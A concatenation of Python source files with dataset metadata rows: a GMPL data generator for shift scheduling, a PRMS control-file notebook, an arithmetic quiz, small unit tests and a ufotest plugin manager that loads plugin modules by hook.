shiftlen_param_name - string name of shift length specific mix parameter key in YAML file
Output:
param tt_shiftlen_min_dys_weeks:=
1 6 1 3
1 6 2 5
1 6 3 5
1 6 4 5
...
"""
# Open the mix file and load it into a YAML object
fn_mix = probspec['reqd_files']['filename_mix']
fin = open(fn_mix,"r")
ttspec = yaml.load(fin)
mixout = StringIO.StringIO()
## print ttspec
## print ttspec['tourtypes']
## print ttspec['tourtypes'][0]
## print ttspec['tourtypes'][0]['min_days_week']
# Get set of shift lengths and order them ascending by length
lenset = set([])
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
lenset.add(s['numbins'])
lengths = list(lenset)
lengths.sort()
len_param = list_to_param('lengths', lengths)
# Number of shift lengths
n_lengths = size(lengths)
numlen_param = scalar_to_param('n_lengths', n_lengths)
# Number of tour types
n_ttypes = size(ttspec['tourtypes'])
numttypes_param = scalar_to_param('n_tts', n_ttypes)
# Tour type length sets
lenxset = get_length_x_from_mix(ttspec)
lenxset_set = list_to_indexedset('tt_length_x', lenxset)
# Midnight threshold for weekend assignments
midthresholds = [m['midnight_thresh'] for m in ttspec['tourtypes']]
midthresh_param = list_to_param('midnight_thresh', midthresholds)
# Parttime flag and bound
ptflags = [m['is_parttime'] for m in ttspec['tourtypes']]
ptflags_param = list_to_param('tt_parttime', ptflags)
ptfrac = ttspec['max_parttime_frac']
ptfrac_param = scalar_to_param('max_parttime_frac', ptfrac)
# Global start window width
width = ttspec['g_start_window_width']
width_param = scalar_to_param('g_start_window_width', width)
# Lower and upper bounds on number scheduled
if 'opt_files' in probspec and 'filename_ttbounds' in probspec['opt_files']:
fn_ttbnds = probspec['opt_files']['filename_ttbounds']
fin_ttbnds = open(fn_ttbnds,"r")
ttbndsspec = yaml.load(fin_ttbnds)
tt_lb = [m['tt_lb'] for m in ttbndsspec['tourtypes']]
tt_lb_param = list_to_param('tt_lb', tt_lb)
tt_ub = [m['tt_ub'] for m in ttbndsspec['tourtypes']]
tt_ub_param = list_to_param('tt_ub', tt_ub)
else:
tt_lb = [m['tt_lb'] for m in ttspec['tourtypes']]
tt_lb_param = list_to_param('tt_lb', tt_lb)
tt_ub = [m['tt_ub'] for m in ttspec['tourtypes']]
tt_ub_param = list_to_param('tt_ub', tt_ub)
# Cost multiplier
tt_cost_multiplier = [m['tt_cost_multiplier'] for m in ttspec['tourtypes']]
tt_cost_multiplier_param = list_to_param('tt_cost_multiplier',
tt_cost_multiplier)
# Min and max cumulative days and prds worked over the weeks
tt_min_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_min_dys_weeks','min_days_week',
'min_shiftlen_days_week')
tt_max_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_max_dys_weeks','max_days_week',
'max_shiftlen_days_week')
tt_min_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_min_prds_weeks','min_prds_week',
'min_shiftlen_prds_week')
tt_max_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_max_prds_weeks','max_prds_week',
'max_shiftlen_prds_week')
# Min and max days and prds worked over the weeks
# for each shift length workable in the tour type
tt_shiftlen_min_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_dys_weeks','min_days_week',
'min_shiftlen_days_week')
tt_shiftlen_max_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_dys_weeks','max_days_week',
'max_shiftlen_days_week')
tt_shiftlen_min_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_prds_weeks','min_prds_week',
'min_shiftlen_prds_week')
tt_shiftlen_max_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_prds_weeks','max_prds_week',
'max_shiftlen_prds_week')
# Min and max days and prds worked each week
tt_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_min_cumul_dys_weeks','min_cumul_days_week',
'min_shiftlen_cumul_days_week')
tt_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_max_cumul_dys_weeks','max_cumul_days_week',
'max_shiftlen_cumul_days_week')
tt_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_min_cumul_prds_weeks','min_cumul_prds_week',
'min_shiftlen_cumul_prds_week')
tt_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_max_cumul_prds_weeks','max_cumul_prds_week',
'max_shiftlen_cumul_prds_week')
# Min and max cumulative days and prds worked over the weeks
# for each shift length workable in the tour type
tt_shiftlen_min_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_cumul_dys_weeks','min_cumul_days_week',
'min_shiftlen_cumul_days_week')
tt_shiftlen_max_cumul_dys_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_cumul_dys_weeks','max_cumul_days_week',
'max_shiftlen_cumul_days_week')
tt_shiftlen_min_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_min_cumul_prds_weeks','min_cumul_prds_week',
'min_shiftlen_cumul_prds_week')
tt_shiftlen_max_cumul_prds_weeks_param = mix_days_prds_params(ttspec,
'tt_shiftlen_max_cumul_prds_weeks','max_cumul_prds_week',
'max_shiftlen_cumul_prds_week')
# Put the parameter pieces together into a single StringIO object
print >>mixout, numlen_param
print >>mixout, len_param
print >>mixout, numttypes_param
print >>mixout, lenxset_set
print >>mixout, midthresh_param
print >>mixout, tt_lb_param
print >>mixout, tt_ub_param
print >>mixout, tt_cost_multiplier_param
print >>mixout, ptflags_param
print >>mixout, ptfrac_param
print >>mixout, width_param
print >>mixout, tt_min_cumul_dys_weeks_param
print >>mixout, tt_max_cumul_dys_weeks_param
print >>mixout, tt_min_cumul_prds_weeks_param
print >>mixout, tt_max_cumul_prds_weeks_param
print >>mixout, tt_min_dys_weeks_param
print >>mixout, tt_max_dys_weeks_param
print >>mixout, tt_min_prds_weeks_param
print >>mixout, tt_max_prds_weeks_param
print >>mixout, tt_shiftlen_min_dys_weeks_param
print >>mixout, tt_shiftlen_max_dys_weeks_param
print >>mixout, tt_shiftlen_min_prds_weeks_param
print >>mixout, tt_shiftlen_max_prds_weeks_param
print >>mixout, tt_shiftlen_min_cumul_dys_weeks_param
print >>mixout, tt_shiftlen_max_cumul_dys_weeks_param
print >>mixout, tt_shiftlen_min_cumul_prds_weeks_param
print >>mixout, tt_shiftlen_max_cumul_prds_weeks_param
# print mixout.getvalue()
if isStringIO:
return mixout.getvalue()
else:
smixout = mixout.read()
return smixout
def get_length_x_from_mix(ttspec):
"""
Get list of lists of shift length indexes for each tour type from
a mix spec.
Inputs:
ttspec - yaml representation of tour type mix parameters
Output:
A list of lists whose elements are the shift length indexes for
each tour type.
Example: [[1,2],[2]]
"""
# Get set of shift lengths and order them ascending by length
lenset = set([])
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
lenset.add(s['numbins'])
lengths = list(lenset)
lengths.sort()
lenxset = []
for m in ttspec['tourtypes']:
shifts = [lengths.index(s['numbins']) for s in m['shiftlengths']]
shifts = [s + 1 for s in shifts]
shifts.sort()
lenxset.append(shifts)
return lenxset
def get_lengths_from_mix(ttspec):
"""
Get set of shift lengths and order them ascending by length
Inputs:
ttspec - yaml representation of tour type mix parameters
Output:
A sorted list of shift lengths.
Example: [8, 16, 20, 24]
"""
#
lenset = set([])
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
lenset.add(s['numbins'])
lengths = list(lenset)
lengths.sort()
return lengths
def csvrow_to_yaml(fn_csv, isStringIO=True):
"""
Convert a comma delimited row of data into a
a yaml representation that can be inserted into the yaml mix file.
This procedure does not not know or care what each row means in the sense
It's just taking a comma or semicolon delimited row and converts it to yaml.
Inputs:
fn_csv - csv filename containing rows of size n_periods_per_day
isstringio - true to return StringIO object, false to return string
Output:
yaml version of csv row of data either as a StringIO
object or a string.
Example:
Input: 0, 1, 0, 0
Output: [0, 1, 0, 0]
"""
fin = open(fn_csv,'r')
dialect = csv.Sniffer().sniff(fin.read(1024),delimiters=',;')
fin.seek(0)
ash_data = csv.reader(fin,dialect)
ash_list = [map(float,row) for row in ash_data]
fin.close
yamlstr = ''
for row in ash_list:
yamlstr += (' - ' + str(row) + '\n')
if isStringIO:
yamlout = StringIO.StringIO()
yamlout.write(yamlstr)
return yamlout.getvalue()
else:
return yamlstr
def ash_to_dat(fn_yni,fn_mix,isStringIO=True):
"""
Convert allowable shift start time inputs into GMPL dat form.
Inputs:
fn_yni - filename of yaml ini scenario file
fn_mix - filename of yaml tour type mix file
isstringio - true to return StringIO object, false to return string
Output:
GMPL dat code for allowable shift start times either as a StringIO
object or a string.
Example:
param allow_start:=
1 1 1 2 0.0
2 1 1 2 0.0
3 1 1 2 0.0
4 1 1 2 0.0
...
13 1 1 2 1.0
14 1 1 2 1.0
15 1 1 2 1.0
"""
fin_yni = open(fn_yni,"r")
probspec = yaml.load(fin_yni)
fin_mix = open(fn_mix,"r")
ttspec = yaml.load(fin_mix)
# param allow_start[i,j,t,s] = 1 if period i and day j is an allowable
# shift start time for shift length s of tour type t
lenxset = get_lengths_from_mix(ttspec)
ash_rows = []
for m in ttspec['tourtypes']:
for s in m['shiftlengths']:
for j in range(len(s['allowable_starttimes'])):
for i in range(len(s['allowable_starttimes'][j])):
length_x = lenxset.index(s['numbins'])
L = [i+1,j+1,length_x+1,m['ttnum'],s['allowable_starttimes'][j][i]]
ash_rows.append(L)
param = 'param allow_start:=\n'
for val in ash_rows:
datarow = ' '.join(map(str, val)) + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def wkends_to_dat(fn_yni,fn_mix,isStringIO=True):
fin_yni = open(fn_yni,"r")
probspec = yaml.load(fin_yni)
fin_mix = open(fn_mix,"r")
ttspec = yaml.load(fin_mix)
n_weeks = probspec['time']['n_weeks']
n_ttypes = size(ttspec['tourtypes'])
patterns_all = create_weekend_base(n_weeks)
wkend_patterns = []
wkend_days = [[],[]]
wkend_days[0] = [1,7]
wkend_days[1] = [6,7]
wkend_rows = []
num_wkend_rows = []
for m in ttspec['tourtypes']:
tt = m['ttnum']
wkend_patterns = [[],[]]
wkend_patterns[0] = [row for row in patterns_all if filterpatterns(row,tt,1,ttspec)]
wkend_patterns[1] = [row for row in patterns_all if filterpatterns(row,tt,2,ttspec)]
# param A[p,j,w,t,e] = 1 if weekend pattern p calls for work on day j of week k for tour type t having weekend type e and 0 otherwise
for i in range(2):
for t in range(1,n_ttypes+1):
for p in range(len(wkend_patterns[i])):
for w in range(n_weeks):
for j in range(2):
L = [p+1,wkend_days[i][j],w+1,t,i+1,wkend_patterns[i][p][w][j]]
wkend_rows.append(L)
for t in range(1,n_ttypes+1):
for i in range(2):
L = [i+1,t,len(wkend_patterns[i])]
num_wkend_rows.append(L)
param = 'param num_weekend_patterns:=\n'
for val in num_wkend_rows:
datarow = ' '.join(map(str, val)) + '\n'
param += datarow
param += ";\n"
param += '\nparam A:=\n'
for val in wkend_rows:
datarow = ' '.join(map(str, val)) + '\n'
param += datarow
param += ";\n"
if isStringIO:
paramout = StringIO.StringIO()
paramout.write(param)
return paramout.getvalue()
else:
return param
def tester():
#print csvrow_to_yaml('infiles/oneweekash.csv',False)
p = create_weekend_base(4)
## p = [(0,1),(1,1),(0,0),(1,0)]
## n = num_full_weekends(p,1)
def mwts_createdat(fn_yni,fn_dat):
"""
Create a GMPL dat file for mwts problems.
Inputs:
fn_yni - Name of YAML input file for the mwts problem
Output:
fn_dat - Name of GMPL dat file to create
"""
fin = open(fn_yni,"r")
probspec = yaml.load(fin)
# General section
num_prds_per_day_param = scalar_to_param('n_prds_per_day',
probspec['time']['n_prds_per_day'])
num_days_per_week_param = scalar_to_param('n_days_per_week',
probspec['time']['n_days_per_week'])
num_weeks_param = scalar_to_param('n_weeks',
probspec['time']['n_weeks'])
# Cost related
labor_budget_param = scalar_to_param('labor_budget',probspec['cost']
['labor_budget'])
cu1_param = scalar_to_param('cu1',probspec['cost']
['understaff_cost_1'])
cu2_param = scalar_to_param('cu2',probspec['cost']
['understaff_cost_2'])
usb_param = scalar_to_param('usb',probspec['cost']
['understaff_1_lb'])
# Demand section
dmd_dat = dmd_min_to_dat('dmd_staff',probspec['reqd_files']['filename_dmd'],mode='unsliced')
# Min staff section
min_dat = dmd_min_to_dat('min_staff',probspec['reqd_files']['filename_min'],mode='unsliced')
# Mix section
mix_dat = mix_to_dat(probspec)
# Weekends worked patterns section
wkends_dat = wkends_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
# Allowable shift start time section
ash_dat = ash_to_dat(fn_yni,probspec['reqd_files']['filename_mix'])
# Put the pieces together
dat = StringIO.StringIO()
print >>dat, num_prds_per_day_param
print >>dat, num_days_per_week_param
print >>dat, num_weeks_param
print >>dat, labor_budget_param
print >>dat, cu1_param
print >>dat, cu2_param
print >>dat, usb_param
print >>dat, mix_dat
print >>dat, dmd_dat
print >>dat, min_dat
print >>dat, wkends_dat
print >>dat, ash_dat
fout = open(fn_dat,"w")
print >>fout, dat.getvalue()
fout.close()
def main():
## dmd_min_to_dat('dmd_staff','infiles/jax_4week.dmd','test.out')
## testout = dmd_min_to_datstringio('dmd_staff','infiles/jax_4week.dmd')
## fout = open('teststringio.out',"w")
## print "Starting to write stringio"
## print >>fout, testout
## print "Ending write stringio"
## fout.close()
mwts_createdat('/home/mark/Documents/research/MultiWeek/exps/mwts01/inputs/simple.yni','/home/mark/Documents/research/MultiWeek/wsmwts/pymwts/tests/simple.dat')
#tester()
if __name__ == '__main__':
main()
| 5,173 | 0 | 115 |
449d1fc3442d6fde6ba47c80a9453ec71f482f75 | 914 | py | Python | 11_gsflow/Check sagehen control file.py | pnorton-usgs/notebooks | 17a38ecd3f3c052b9bd785c2e53e16a9082d1e71 | [
"MIT"
] | null | null | null | 11_gsflow/Check sagehen control file.py | pnorton-usgs/notebooks | 17a38ecd3f3c052b9bd785c2e53e16a9082d1e71 | [
"MIT"
] | null | null | null | 11_gsflow/Check sagehen control file.py | pnorton-usgs/notebooks | 17a38ecd3f3c052b9bd785c2e53e16a9082d1e71 | [
"MIT"
] | null | null | null | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python [conda env:bandit_38]
# language: python
# name: conda-env-bandit_38-py
# ---
# %% language="javascript"
# IPython.notebook.kernel.restart()
# %%
from pyPRMS.ControlFile import ControlFile
# %%
base_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/tests_prms6/sagehen/prms6'
control_dir = f'{base_dir}'
control_file = f'{control_dir}/prms6.control'
# %%
ctl = ControlFile(control_file)
# %%
ctl.control_variables.keys()
# %%
print(ctl.get('windspeed_day'))
# %%
modules_used = ctl.modules.values()
print(modules_used)
# %%
ctl.modules.items()
# %%
ctl.get('temp_module').values
# %%
# %%
ctl.write(f'{control_dir}/prms6.control')
# %%
| 17.576923 | 91 | 0.666302 | # ---
# jupyter:
# jupytext:
# formats: ipynb,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python [conda env:bandit_38]
# language: python
# name: conda-env-bandit_38-py
# ---
# %% language="javascript"
# IPython.notebook.kernel.restart()
# %%
from pyPRMS.ControlFile import ControlFile
# %%
base_dir = '/Users/pnorton/Projects/National_Hydrology_Model/src/tests_prms6/sagehen/prms6'
control_dir = f'{base_dir}'
control_file = f'{control_dir}/prms6.control'
# %%
ctl = ControlFile(control_file)
# %%
ctl.control_variables.keys()
# %%
print(ctl.get('windspeed_day'))
# %%
modules_used = ctl.modules.values()
print(modules_used)
# %%
ctl.modules.items()
# %%
ctl.get('temp_module').values
# %%
# %%
ctl.write(f'{control_dir}/prms6.control')
# %%
| 0 | 0 | 0 |
909094cdb2b9de5d6070c452b32d0ee249e210c5 | 1,999 | py | Python | Arithmetic Exam Application/arithmetic.py | andreimaftei28/projects-on-JetBrainAcademy | 8c2b8ab7bab5757db94e9f0b6d55c33852f64ee1 | [
"MIT"
] | null | null | null | Arithmetic Exam Application/arithmetic.py | andreimaftei28/projects-on-JetBrainAcademy | 8c2b8ab7bab5757db94e9f0b6d55c33852f64ee1 | [
"MIT"
] | null | null | null | Arithmetic Exam Application/arithmetic.py | andreimaftei28/projects-on-JetBrainAcademy | 8c2b8ab7bab5757db94e9f0b6d55c33852f64ee1 | [
"MIT"
] | null | null | null | import random
level1 = "simple operations with numbers 2-9"
level2 = "integral squares of 11-29"
message = f"Which level do you want? Enter a number:\n1 - {level1}\n2 - {level2}\n "
user_choice = choose_level(input(message))
while user_choice == "Incorrect format.":
print(user_choice)
user_choice = choose_level(input(message))
n = check_result(user_choice)
save_res = input(f"Your mark is {n}/5. Would you like to save the result? Enter yes or no.\n")
if save_res.lower() == "yes" or save_res.lower() == "y":
name = input("What is your name?\n")
with open("results.txt", "a") as file:
file.write(f"{name}: {n}/5 in level {user_choice} ({level1 if user_choice == 1 else level2})")
print(f'The results are saved in "{file.name}"') | 28.15493 | 102 | 0.563782 | import random
def operations(*args):
if len(args) > 1:
var1, oper, var2 = args
if oper == "+":
return var1 + var2
elif oper == "-":
return var1 - var2
elif oper == "*":
return var1 * var2
else:
return args[0] ** 2
def int_or_float(var):
if var == "":
return "Incorrect format."
try:
if "." in var:
return float(var)
else:
return int(var)
except:
return "Incorrect format."
def choose_level(var):
if var not in ["1", "2"]:
return "Incorrect format."
return int(var)
level1 = "simple operations with numbers 2-9"
level2 = "integral squares of 11-29"
message = f"Which level do you want? Enter a number:\n1 - {level1}\n2 - {level2}\n "
user_choice = choose_level(input(message))
while user_choice == "Incorrect format.":
print(user_choice)
user_choice = choose_level(input(message))
def check_result(choice):
a = 0
for _ in range(5):
if choice == 1:
*args, = random.randrange(2, 10), random.choice("+-*"), random.randrange(2, 10)
else:
*args, = random.randrange(11, 30),
print(*args)
result = operations(*args)
users_result = int_or_float(input())
while users_result == "Incorrect format.":
print(users_result)
users_result = int_or_float(input())
if users_result == result:
a += 1
print("Right!")
else:
print("Wrong!")
return a
n = check_result(user_choice)
save_res = input(f"Your mark is {n}/5. Would you like to save the result? Enter yes or no.\n")
if save_res.lower() == "yes" or save_res.lower() == "y":
name = input("What is your name?\n")
with open("results.txt", "a") as file:
file.write(f"{name}: {n}/5 in level {user_choice} ({level1 if user_choice == 1 else level2})")
print(f'The results are saved in "{file.name}"') | 1,137 | 0 | 92 |
2956ea9a2b0645c1c811dc3b0a8f13efd29c18be | 1,245 | py | Python | tests/test_task.py | Yelp/pygear | 8d9fe5f81b68666749149b1a64350c856b8a14a4 | [
"BSD-3-Clause"
] | 4 | 2015-04-01T21:38:09.000Z | 2021-04-29T00:02:09.000Z | tests/test_task.py | Yelp/pygear | 8d9fe5f81b68666749149b1a64350c856b8a14a4 | [
"BSD-3-Clause"
] | 6 | 2015-01-29T21:19:32.000Z | 2018-01-14T00:35:31.000Z | tests/test_task.py | Yelp/pygear | 8d9fe5f81b68666749149b1a64350c856b8a14a4 | [
"BSD-3-Clause"
] | 5 | 2015-02-04T02:17:59.000Z | 2016-06-07T12:38:12.000Z | import gc
import mock
import pytest
import pygear
from . import noop_serializer
@pytest.fixture
| 17.054795 | 75 | 0.714859 | import gc
import mock
import pytest
import pygear
from . import noop_serializer
@pytest.fixture
def t():
return pygear.Task(None, None)
def test_task_data_size(t):
assert t.data_size() == 0
def test_task_denominator(t):
assert t.denominator() == 0
def test_task_error(t):
assert t.error() is None
def test_task_function_name(t):
assert t.function_name() is None
def test_task_is_known(t):
assert not t.is_known()
def test_task_is_running(t):
assert not t.is_running()
def test_task_job_handle(t):
assert t.job_handle() is None
def test_task_numerator(t):
assert t.numerator() == 0
def test_task_result(t):
assert t.result() is None
def test_task_returncode(t):
assert pygear.describe_returncode(t.returncode()) == 'INVALID_ARGUMENT'
def test_task_set_serializer(t):
t.set_serializer(noop_serializer()) # valid
with pytest.raises(AttributeError): # invalid
t.set_serializer("a string doesn't implement loads.")
def test_task_strstate(t):
assert t.strstate() is None
def test_task_unique(t):
assert t.unique() is None
def test_gc_traversal(t):
sentinel = mock.Mock()
t.set_serializer(sentinel)
assert sentinel in gc.get_referents(t)
| 787 | 0 | 344 |
6c8c72e97a9e8e3f052049a4d52baeae902f0f4a | 700 | py | Python | tests/vocab_test.py | samuela/happyentropy | be7ac0ef255ac4336c7903b9e4e3ad36065fda9d | [
"MIT"
] | null | null | null | tests/vocab_test.py | samuela/happyentropy | be7ac0ef255ac4336c7903b9e4e3ad36065fda9d | [
"MIT"
] | null | null | null | tests/vocab_test.py | samuela/happyentropy | be7ac0ef255ac4336c7903b9e4e3ad36065fda9d | [
"MIT"
] | null | null | null | import unittest
from happyentropy import vocab
if __name__ == '__main__':
unittest.main()
| 29.166667 | 49 | 0.737143 | import unittest
from happyentropy import vocab
def all_unique(lst):
return len(set(lst)) == len(lst)
class VocabTest(unittest.TestCase):
def testLengths(self):
self.assertEqual(len(vocab.COUNTS), 32)
self.assertEqual(len(vocab.ADJECTIVES), 128)
self.assertEqual(len(vocab.ANIMALS), 128)
self.assertEqual(len(vocab.VERBS), 128)
self.assertEqual(len(vocab.ADVERBS), 64)
def testUnique(self):
self.assertTrue(all_unique(vocab.COUNTS))
self.assertTrue(all_unique(vocab.ADJECTIVES))
self.assertTrue(all_unique(vocab.ANIMALS))
self.assertTrue(all_unique(vocab.VERBS))
self.assertTrue(all_unique(vocab.ADVERBS))
if __name__ == '__main__':
unittest.main()
| 498 | 14 | 95 |
bd0d3e125e8fa9cf371de0d2149bace1dd5a5ff2 | 11,845 | py | Python | ufotest/plugin.py | the16thpythonist/ufotest | 8c94e4227180328e6c29d6700c9a5f4aaecab3d2 | [
"MIT"
] | null | null | null | ufotest/plugin.py | the16thpythonist/ufotest | 8c94e4227180328e6c29d6700c9a5f4aaecab3d2 | [
"MIT"
] | 3 | 2021-03-19T15:52:59.000Z | 2022-01-13T03:32:31.000Z | ufotest/plugin.py | the16thpythonist/ufotest | 8c94e4227180328e6c29d6700c9a5f4aaecab3d2 | [
"MIT"
] | null | null | null | import os
import sys
import importlib.util
from typing import Any, Callable, Tuple
from collections import defaultdict
"""
PLANNING
So I want the plugin manager to work really similar to how the hook system in Wordpress works:
https://developer.wordpress.org/plugins/hooks/
Thats because I already have a lot of experience with that system and I kind of really like it. It just makes sense
and is rather intuitive to use. The main point is that it uses hooks: A hook is essentially a point in the execution
of the main program where a plugin can insert custom functionality to be executed. Wordpress differs between two
types of hooks: action hooks simply allow the execution of code, they dont have a return value. filter hooks allow
the modification of certain important values of the main program.
"""
class PluginManager:
"""
This class represents the plugin manager which is responsible for managing the plugin related functionality for
ufotest. This mainly included the dynamic discovery and loading of the plugins at the beginning of the program
execution and the management and application of the additional action and filter hooks added by those plugins.
**UFOTEST PLUGIN SYSTEM**
The ufotest plugin system is strongly influenced by the Wordpress plugin system
(https://developer.wordpress.org/plugins/hooks/). It uses so called hooks to enable plugins to insert custom
functions to be executed at vital points during the ufotest main program routine. A plugin simply has to decorate
a function with the according hook decorator and supply a string identifier for which hook to use. The function
will then be registered within the plugin manager and wait there until the according hook is actually called from
within the main routine.
The plugin system differentiates between two types of hooks: *action* hooks dont have a return value, if a function
is hooked into an action hook, this just means that it will be executed at a certain point. *filter* hooks on the
other side have a return value. Filter hooks present the possibility to modify certain key data structures during
the execution of the main ufotest routine.
**USING THE PLUGIN MANAGER**
Alongside the config instance for ufotest, the plugin manager instance is the second most important thing. It has
to be accessible by all parts of the code at any time. This is because the individual parts of the code actually
invoke the special hooks by referencing the plugin manager. To create a new instance of the pm it only needs the
folder which is supposed to contain the plugins. After creating the instance, the "load_plugins" method has to be
used to actually load the plugins from that folder. At this point the internal dicts "filters" and "actions"
already contain all the callable instance linked to the specific hooks, just waiting to be executed. Invoking a
hook within the main routine can be done with the "do_action" and "apply_filter" methods.
.. code-block:: python
pm = PluginManager("/path/to/plugins")
pm.load_plugins()
# Some time later
data = {}
data_filtered = pm.apply_filter("custom_filter", data)
pm.do_action("custom_action")
**LOADING THE PLUGINS**
The plugins themselves are dynmically imported during the runtime of the ufotest routine. The plugin manager will
attempt to import the plugins from the folder which was passed to its constructor. Some important assumptions are
made about what constitutes a valid plugin:
- Each plugin is assumed to be a FOLDER. The folder name will be used as the plugin name, by which it will be
identified
- Within each plugin folder there has to be at least a "main.py" python module. This is what is actually imported
by the plugin system. Consequentially, all of it's top level code will be executed on import time.
- Important detail: Folders starting with an underscore will be ignored! This is mainly a pragmatic choice to make
sure that the plugin system does not attempt to import __pycache__ but can also be used to quickly disable
plugins
"""
# -- For invoking hooks in the main system --
def do_action(self, hook_name: str, *args, **kwargs) -> None:
"""
Executes all the plugin functions which have been hooked to the action hook identified by *hook_name*.
The hook call may include additional positional and keyword arguments which are passed as they are to the
registered callbacks.
:param hook_name: The string name identifying the hook to be executed.
:return: void
"""
if hook_name in self.actions.keys():
callback_specs = sorted(self.actions[hook_name], key=lambda spec: spec['priority'], reverse=True)
callbacks = [spec['callback'] for spec in callback_specs]
for callback in callbacks:
callback(*args, **kwargs)
def apply_filter(self, hook_name: str, value: Any, *args, **kwargs) -> Any:
"""
Applies all the plugin callback functions which have been hooked to the filter hook identified by *hook_name*
to filter the given *value*. The result of each filter operation is then passed as the value argument to the
next filter callback in order of priority.
The hook call may include additional positional and keyword arguments which are passed as they are to the
registered callbacks.
:param hook_name: THe string name identifying the hook to be executed.
:param value: Whatever value that specific hook is supposed to manipulate
:return: The manipulated version of the passed value argument
"""
filtered_value = value
if hook_name in self.filters.keys():
callback_specs = sorted(self.filters[hook_name], key=lambda spec: spec['priority'], reverse=True)
callbacks = [spec['callback'] for spec in callback_specs]
for callback in callbacks:
filtered_value = callback(filtered_value, *args, **kwargs)
return filtered_value
# -- For registering hook callbacks in the plugins --
def register_filter(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
"""
Registers a new filter *callback* function for the hook identified by *hook_name* with the given *priority*.
:param hook_name: The name of the hook for which to register the function
:param callback: A callable object, which is then actually supposed to be executed when the according hook is
invoked. Since this is a filter hook, the callback needs to accept at least one argument which is the
value to be filtered and it also needs to return a manipulated version of this value.
:param priority: The integer defining the priority of this particular callback. Default is 10.
:return: void
"""
self.filters[hook_name].append({
'callback': callback,
'priority': priority
})
def register_action(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
"""
Registers a new action *callback* function for the hook identified by *hook_name* with the given *priority*.
:param hook_name: The name of the hook for which to register the function
:param callback: A callable object, which is then actually supposed to be executed when the according hook is
invoked.
:param priority: The integer defining the priority of this particular callback. Default is 10.
:return: void
"""
self.actions[hook_name].append({
'callback': callback,
'priority': priority
})
# -- Loading the plugins --
def load_plugins(self):
"""
Loads all the plugins from the plugin folder which was passed to the constructor of the manager instance.
After this method was executed, it can be assumed that the internal dicts "filters" and "actions" contain all
the callable instance linked to the according hook names.
:return: void
"""
for root, folders, files in os.walk(self.plugin_folder_path, topdown=True):
for folder_name in folders:
# IMPORTANT: We will ignore all folders which start with and underscore. The very practical reason for
# this is that the plugins folder will almost certainly contain a __pycache__ folder which obviously
# is not a ufotest plugin and thus cause an error. But this behaviour is also nice to disable certain
# plugins without removing them completely: simply rename them to start with an underscore
# 2.0.0 - 29.11.2021: We also need to ignore folders which start with a dot, as these are the linux
# hiddenfolders. There were issues with runaway .idea and .git folders being attempted for import.
if folder_name[0] in ['_', '.']:
continue
plugin_path = os.path.join(root, folder_name)
plugin_name, module = self.import_plugin_by_path(plugin_path)
self.plugins[plugin_name] = module
# 2.0.0 - 29.11.2021: So as to not accidentally attempt to import all plugin subfolders as plugins as well.
# This was previously a bug
break
def reset(self):
"""
Resets the plugin manager, which means that it unloads all registered filter and action hooks. Also clears the
internal reference to all the plugin modules.
:returns: void
"""
self.filters = defaultdict(list)
self.actions = defaultdict(list)
self.plugins = {}
@classmethod
def import_plugin_by_path(cls, path: str) -> Tuple[str, Any]:
"""
Given the path of a folder, this method will attempt to dynamically import a "main.py" module within this
folder interpreting it as a ufotest plugin.
:return: A tuple of two elements, where the first is the string name of the plugin and the second is the
imported module instance.
"""
plugin_name = os.path.basename(path)
plugin_main_module_path = os.path.join(path, 'main.py')
if not os.path.exists(plugin_main_module_path):
raise FileNotFoundError((
f'Cannot import folder "{plugin_name}" as an ufotest plugin, because the folder does not contain a '
f'main.py python module. All ufotest plugins need to have a main.py file! This is the top level file '
f'which is imported to import the plugins functionality into the ufotest system.\n '
f'Path being checked: {plugin_main_module_path}'
))
# 29.11.2021
# This will add the parent folder in which the actual plugin folder resides to the plugin path. This is due to
# a problem with the plugins: Prior imports of another plugin module from the plugins main.py module did not
# work.
plugin_folder = os.path.dirname(path)
if plugin_folder not in sys.path:
sys.path.append(plugin_folder)
spec = importlib.util.spec_from_file_location(plugin_name, plugin_main_module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
sys.modules[plugin_name] = module
return plugin_name, module
| 50.190678 | 119 | 0.690756 | import os
import sys
import importlib.util
from typing import Any, Callable, Tuple
from collections import defaultdict
"""
PLANNING
So I want the plugin manager to work really similar to how the hook system in Wordpress works:
https://developer.wordpress.org/plugins/hooks/
Thats because I already have a lot of experience with that system and I kind of really like it. It just makes sense
and is rather intuitive to use. The main point is that it uses hooks: A hook is essentially a point in the execution
of the main program where a plugin can insert custom functionality to be executed. Wordpress differs between two
types of hooks: action hooks simply allow the execution of code, they dont have a return value. filter hooks allow
the modification of certain important values of the main program.
"""
class PluginManager:
"""
This class represents the plugin manager which is responsible for managing the plugin related functionality for
ufotest. This mainly included the dynamic discovery and loading of the plugins at the beginning of the program
execution and the management and application of the additional action and filter hooks added by those plugins.
**UFOTEST PLUGIN SYSTEM**
